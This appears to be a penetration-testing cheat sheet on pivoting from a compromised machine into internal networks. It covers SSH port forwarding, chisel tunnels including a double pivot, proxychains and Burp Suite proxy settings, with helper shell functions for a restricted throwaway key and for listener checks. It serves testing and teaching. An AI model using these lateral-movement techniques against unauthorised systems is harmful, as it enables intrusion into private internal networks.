# Pivoting

## Network setup

The following sections rely on this network setup.

```
┌──────────────┐          ┌──────────────┐            ┌──────────────┐
│ attacking    │          │ compromised  │            │ target       │
│ machine      │          │ machine      │            │ machine      │
│ (local)      │          │ (pivot)      │            │ (target)     │
│              │          │              │            │              │
│  10.10.10.2 ◄┼──public──┼► 10.10.10.5  │            │              │
│              │          │              │            │              │
│              │          │  172.16.0.5 ◄┼──internal──┼► 172.16.0.10 │
│              │          │              │            │              │
└──────────────┘          └──────────────┘            └──────────────┘
```

| Machine name        | Short name | User   |
| ------------------- | ---------- | ------ |
| Attacking Machine   | local      | me     |
| Compromised Machine | pivot      | victim |
| Target Machine      | target     | -      |

## SSH

### Common options

| option | description                                               |
| ------ | --------------------------------------------------------- |
| `-L`   | Forward connection (**L**ocal port forwarding)            |
| `-R`   | Reverse connection (**R**emote port forwarding)           |
| `-D`   | SOCKS proxy (**D**ynamic port forwarding)                 |
| `-f`   | Go to the background once the connection is established   |
| `-N`   | Only establish the connection, don't execute any commands |

### Forward connection (Local port forwarding)

```
  local                           pivot              target
10.10.10.2                     10.10.10.5          172.16.0.10
                               172.16.0.5
    │                               │                   │
    │                               │                   │
    │ssh -L 1337:172.16.0.10:80     │                   │
    ├──────────────────────────────►│                   │
    │                               │                   │
    │nc 127.0.0.1 1337              │                   │
    ├──────────────────────────────►│        80         │
    │                               ├──────────────────►│
    │                               │                   │
```

Set up a local port forward through the pivot to the target: `127.0.0.1:1337` on local now reaches `172.16.0.10:80`.

```bash
ssh -L 1337:172.16.0.10:80 victim@10.10.10.5
```

Execute command

```bash
<cmd>

# Example
nc 127.0.0.1 1337
```

### Reverse connection (Remote port forwarding)

```
  local                           pivot              target
10.10.10.2                     10.10.10.5          172.16.0.10
                               172.16.0.5
    │                               │                   │
    │                               │                   │
    │     ssh -R 1337:172.16.0.10:80│                   │
    │◄──────────────────────────────┤                   │
    │                               │                   │
    │nc 127.0.0.1 1337              │                   │
    ├──────────────────────────────►│        80         │
    │                               ├──────────────────►│
    │                               │                   │
```

As the pivot will connect back from the target network to our own machine, using a key we leave behind on that host, we need to take some precautions to ensure our safety.

1. Generate a new ssh key pair

```bash
ssh-keygen
```

2. Add the public key to `~/.ssh/authorized_keys` on the attacking machine (local) with the following restrictions

```bash
# <pivot-ip> is the host that will connect back, i.e. the pivot (10.10.10.5 in this setup)
from="<pivot-ip>",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <pub-key>
```

3. Check the ssh server status (local)

```bash
sudo systemctl status ssh
```

4. Start the ssh server (if not already running)

```bash
sudo systemctl start ssh
```

5. Copy the private key over to the pivot\
   ⚠️ Normally we would never give away our private key, but that's why we're using a new throwaway key pair here! ⚠️
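As an added example (not part of the original cheat sheet), this shell function builds the restricted `authorized_keys` line for the throwaway key and, with `permitlisten` (OpenSSH 7.8 or newer), also pins the one port the key may open with `-R`, so a key recovered from the pivot cannot expose anything else on the attacking machine. The key path under `~/.ssh` is an assumption.

```bash
#!/usr/bin/env bash
# Added example: build the restricted authorized_keys entry for the throwaway
# key. permitlisten (OpenSSH 7.8+) limits the key to a single -R listen port.
set -eu

# restricted_key_line <from-ip> <listen-port> <public-key>
# Prints one authorized_keys line. from-ip is the host that connects back, the
# pivot (10.10.10.5 here). The forced command only runs when a session is
# requested, which `ssh -N` never does, so the tunnel stays up.
restricted_key_line() {
  local from_ip="$1" port="$2" pubkey="$3"
  printf 'from="%s",permitlisten="%s",command="echo %s",no-agent-forwarding,no-X11-forwarding,no-pty %s\n' \
    "$from_ip" "$port" \
    "'This account can only be used for port forwarding'" \
    "$pubkey"
}

# install_throwaway_key <from-ip> <listen-port> [key-path]
# Generates a fresh, passphrase-less key pair (it will live on the pivot) and
# appends the restricted line to ~/.ssh/authorized_keys on the local machine.
# The default key-path is an assumption; any path works.
install_throwaway_key() {
  local from_ip="$1" port="$2" key="${3:-$HOME/.ssh/throwaway-key}"
  mkdir -p "$HOME/.ssh" && chmod 700 "$HOME/.ssh"
  ssh-keygen -q -t ed25519 -N '' -C "throwaway-from-$from_ip" -f "$key"
  restricted_key_line "$from_ip" "$port" "$(cat "$key.pub")" \
    >> "$HOME/.ssh/authorized_keys"
  chmod 600 "$HOME/.ssh/authorized_keys"
  echo "copy $key to the pivot; it may only open -R $port from $from_ip"
}

# Usage on local, for the setup above:  install_throwaway_key 10.10.10.5 1337
```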

Set up a remote port forward from the pivot: `127.0.0.1:1337` on local now reaches `172.16.0.10:80` through the pivot.

```bash
# -N: don't request a command; the forced command in authorized_keys would
# otherwise run, exit, and take the tunnel down with it
ssh -N -R 1337:172.16.0.10:80 me@10.10.10.2 -i throwaway-key
```

Execute command (example)

```bash
nc 127.0.0.1 1337
```

### Socks proxy (Dynamic port forwarding)

```
  local                             pivot              target
10.10.10.2                       10.10.10.5          172.16.0.10
                                 172.16.0.5
    │                                 │                   │
    │                                 │                   │
    │ssh -D 1337 [...]                │                   │
    ├────────────────────────────────►│                   │
    │                                 │                   │
    │proxychains nc 172.16.0.10 any   │                   │
    ├────────────────────────────────►│        any        │
    │                                 ├──────────────────►│
    │                                 │                   │
```

Set up a SOCKS proxy on `127.0.0.1:1337` (local) that forwards any TCP port to any host the pivot can reach.

```bash
ssh -D 1337 victim@10.10.10.5
```

proxychains.conf (see also below)

```bash
socks5 127.0.0.1 1337
```

Execute command (example)

```bash
proxychains nc 172.16.0.10 80
```

### Socks proxy (reverse)

```
  local                             pivot              target
10.10.10.2                       10.10.10.5          172.16.0.10
                                 172.16.0.5
    │                                 │                   │
    │                                 │                   │
    │                ssh -R 1337 [...]│                   │
    │◄────────────────────────────────┤                   │
    │                                 │                   │
    │proxychains nc 172.16.0.10 any   │                   │
    ├────────────────────────────────►│        any        │
    │                                 ├──────────────────►│
    │                                 │                   │
```

Set up a reverse SOCKS proxy from the pivot (reverse dynamic forwarding, OpenSSH 7.6 or newer); on local, use `proxychains` with `socks5 127.0.0.1 1337` exactly as above.

```bash
ssh -N -R 1337 me@10.10.10.2 -i throwaway-key
```

## Chisel

> A fast TCP/UDP tunnel over HTTP\
> [GitHub - jpillora/chisel](https://github.com/jpillora/chisel)

### Port forwarding

```
┌────────┐                   ┌────────┐   ┌────────┐
│ local  │                   │ pivot  │   │ target │
│        │                   │        │   │        │
│  9000 ◄┼──chisel───────────┼► 9000  │   │        │
│        │                   │        │   │        │
│  9001 ─┼──port-forwarding──┼────────┼───┼► 80    │
│        │                   │        │   │        │
└────────┘                   └────────┘   └────────┘
```

```
  local                                        pivot              target
10.10.10.2                                  10.10.10.5          172.16.0.10
                                            172.16.0.5
    │                                            │                   │
    │                                            │                   │
    │./chisel server -p 9000 -reverse            │                   │
    ├──┐                                         │                   │
    │  │                                         │                   │
    │◄─┘                                         │                   │
    │                                            │                   │
    │       ./chisel client 10.10.10.2:9000 [...]│                   │
    │◄───────────────────────────────────────────┤                   │
    │                                            │                   │
    │nc 127.0.0.1 9001                           │                   │
    ├───────────────────────────────────────────►│        80         │
    │                                            ├──────────────────►│
    │                                            │                   │
```

Start server (local)

```bash
./chisel server -p 9000 -reverse
```

Start client (pivot)

```bash
# local listens on 127.0.0.1:9001 and forwards, through the pivot, to 172.16.0.10:80
./chisel client 10.10.10.2:9000 R:127.0.0.1:9001:172.16.0.10:80
```

Execute command (example)

```bash
nc 127.0.0.1 9001
```

### SOCKS proxy

```
┌────────┐                   ┌────────┐   ┌────────┐
│ local  │                   │ pivot  │   │ target │
│        │                   │        │   │        │
│  9000 ◄┼──chisel───────────┼► 9000  │   │        │
│        │                   │        │   │        │
│  1080 ─┼──SOCKS─proxy──────┼────────┼───┼► any   │
│        │                   │        │   │        │
└────────┘                   └────────┘   └────────┘
```

```
  local                                        pivot              target
10.10.10.2                                  10.10.10.5          172.16.0.10
                                            172.16.0.5
    │                                            │                   │
    │                                            │                   │
    │./chisel server -p 9000 -reverse            │                   │
    ├──┐                                         │                   │
    │  │                                         │                   │
    │◄─┘                                         │                   │
    │                                            │                   │
    │     ./chisel client 10.10.10.2:9000 R:socks│                   │
    │◄───────────────────────────────────────────┤                   │
    │                                            │                   │
    │proxychains nc 172.16.0.10 any              │                   │
    ├───────────────────────────────────────────►│        any        │
    │                                            ├──────────────────►│
    │                                            │                   │
```

Start server (local)

```bash
./chisel server -p 9000 -reverse
```

Start client (pivot)

```bash
./chisel client 10.10.10.2:9000 R:socks
```

Note: `R:socks` opens the SOCKS listener on port 1080 of the chisel server (local); use `R:<socks-port>:socks` to pick another port.

Execute command (example)

```bash
proxychains nc 172.16.0.10 80
```

### Double pivot (via SOCKS proxies)

```
┌─subnet1───────────────────────────┐┌─subnet2───────────────────┐┌─subnet3───────────────┐
│                                   ││                           ││                       │
│  ┌─local──┐                   ┌─pivot1─┐                   ┌─pivot2─┐       ┌─target─┐  │
│  │        │                   │        │                   │        │       │        │  │
│  │  9000 ◄├──chisel───────────┤► 9000  │                   │        │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │        │                   │  9001 ◄├──chisel───────────┤► 9001  │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │  1080 ─┼──SOCKS─proxy──────┼────────┼─► any             │        │       │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  │  1081 ─┼───────────────────┼────────┼──SOCKS─proxy──────┼────────┼─► any │        │  │
│  │        │                   │        │                   │        │       │        │  │
│  └────────┘                   └────────┘                   └────────┘       └────────┘  │
│                                   ││                           ││                       │
└───────────────────────────────────┘└───────────────────────────┘└───────────────────────┘
```

```
┌─subnet1───────────────────────────────────────┐┌─subnet2───────────────────────────────────┐┌─subnet3───────────────┐

  local                                        pivot1                                      pivot2              target
10.10.10.2                                  10.10.10.5                                   172.16.0.10         172.16.1.20
                                            172.16.0.5                                   172.16.1.10         
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │./chisel server -p 9000 -reverse            │                                            │                   │
    ├──┐                                         │                                            │                   │
    │  │                                         │                                            │                   │
    │◄─┘                                         │                                            │                   │
    │                                            │                                            │                   │
    │     ./chisel client 10.10.10.2:9000 R:socks│                                            │                   │
    │◄───────────────────────────────────────────┤                                            │                   │
    │                                            │                                            │                   │
    │                                            │./chisel server -p 9001 -reverse            │                   │
    │                                            ├──┐                                         │                   │
    │                                            │  │                                         │                   │
    │                                            │◄─┘                                         │                   │
    │                                            │                                            │                   │
    │                                            │./chisel client 172.16.0.5:9001 R:1081:socks│                   │
    │                                            │◄───────────────────────────────────────────┤                   │
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │                                            │                                            │                   │
    │proxychains nc <target-ip> any              │                                            │                   │
    ├───────────────────────────────────────────►│        any                                 │                   │
    │                                            ├───────────────────────────────────────────►│        any        │
    │                                            │                                            ├──────────────────►│
    │                                            │                                            │                   │
```

Start server (local)

```bash
./chisel server -p 9000 -reverse
```

Start client (pivot1)

```bash
./chisel client 10.10.10.2:9000 R:socks
```

Start another server (pivot1)

```bash
./chisel server -p 9001 -reverse
```

Start another client (pivot2)

```bash
# opens the SOCKS listener on pivot1:1081 (a bare R:socks would use 1080)
./chisel client 172.16.0.5:9001 R:1081:socks
```

Add a second proxy to `proxychains.conf` (on local). In the default `strict_chain` mode proxychains walks the list in order, and every address after the first is connected through the previous proxy: the second line is resolved from pivot1's point of view, so it must be the SOCKS port that pivot2's chisel client opened on pivot1 (more on proxychains below).

```bash
# local:1080 -> SOCKS opened by pivot1's client, exits at pivot1
socks5 127.0.0.1 1080
# pivot1:1081 -> SOCKS opened by pivot2's client, exits at pivot2
socks5 127.0.0.1 1081
```

Execute command (example)

```bash
proxychains nc 172.16.1.20 80
```

## Verify

Check that the forwarded ports are listening, and on which interface: `ssh -R` binds the far end to loopback unless `GatewayPorts` is enabled on the server, while chisel remotes bind to all interfaces unless a local host is given (as in `R:127.0.0.1:9001:172.16.0.10:80` above).

```bash
netstat -tulpn
# or, where netstat is not installed
ss -tulpn
```

E.g.

```
[...]
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      50883/ssh
tcp6       0      0 ::1:1337                :::*                    LISTEN      50883/ssh
[...]
```
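As an added check (example code, not from the cheat sheet): a shell function that filters `netstat -tulpn` or `ss -tulpn` output down to the TCP listeners bound to something other than loopback, which is what you do not want to see for a tunnel endpoint on the attacking machine. The sample output inside it is constructed.

```bash
#!/usr/bin/env bash
# Added example: list tunnel listeners that other hosts could reach. Feed it
# `netstat -tulpn` or `ss -tulpn` output on stdin. UDP sockets are ignored
# (every tunnel on this page is TCP).
set -eu

# non_loopback_listeners: prints "<proto> <local address> <owner>" for each TCP
# socket in LISTEN state that is not bound to 127.0.0.1, ::1 or localhost.
# Both column layouts are handled: netstat has the state in column 6 and the
# address in column 4, ss has the state in column 2 and the address in column 5.
non_loopback_listeners() {
  awk '
    $1 ~ /^tcp6?$/ {
      if ($6 == "LISTEN")      { addr = $4; owner = $7 }
      else if ($2 == "LISTEN") { addr = $5; owner = $7 }
      else next
      if (addr ~ /^(127\.0\.0\.1|::1|\[::1\]|localhost):[0-9]+$/) next
      print $1, addr, owner
    }'
}

# sample_netstat: constructed `netstat -tulpn` output for a stand-alone run.
# 1337 is the ssh -R end from above (loopback only, fine); 1080 is a SOCKS
# listener that was started without a bind address and is exposed.
sample_netstat() {
  cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      50883/ssh
tcp6       0      0 ::1:1337                :::*                    LISTEN      50883/ssh
tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN      51002/chisel
tcp        0      0 10.10.10.2:22           10.10.10.5:40212        ESTABLISHED 50883/ssh
udp        0      0 0.0.0.0:68              0.0.0.0:*                           812/dhclient
EOF
}

# Live use:  netstat -tulpn | non_loopback_listeners   (or ss -tulpn | ...)
# Demo on the constructed sample; prints only the exposed chisel SOCKS port.
sample_netstat | non_loopback_listeners
```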

## proxychains

> A tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.\
> [GitHub - haad/proxychains: proxychains](https://github.com/haad/proxychains)

### Config file

Proxychains looks for configuration in the following order:

1. The file named in the `PROXYCHAINS_CONF_FILE` environment variable
2. The file given on the command line with `-f proxychains.conf`
3. `./proxychains.conf`
4. `~/.proxychains/proxychains.conf`
5. `/etc/proxychains.conf`

Minimal proxy entry (it belongs in the `[ProxyList]` section at the end of the file):

```
[ProxyList]
socks5 127.0.0.1 1080
```

Run command via proxychains

```bash
proxychains <cmd>
```

## Burp Suite

To use Burp Suite in this setup, point it at the SOCKS proxy.

`Project options` or `User options` → `SOCKS Proxy` → `☑️ Use SOCKS Proxy`

* `SOCKS proxy host:` `127.0.0.1`
* `SOCKS proxy port:` `1080`

⚠️ Keep your browser pointing to Burp Suite's proxy as usual! ⚠️

## Foxy Proxy

See [Firefox extensions](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/misc/firefox-extensions)
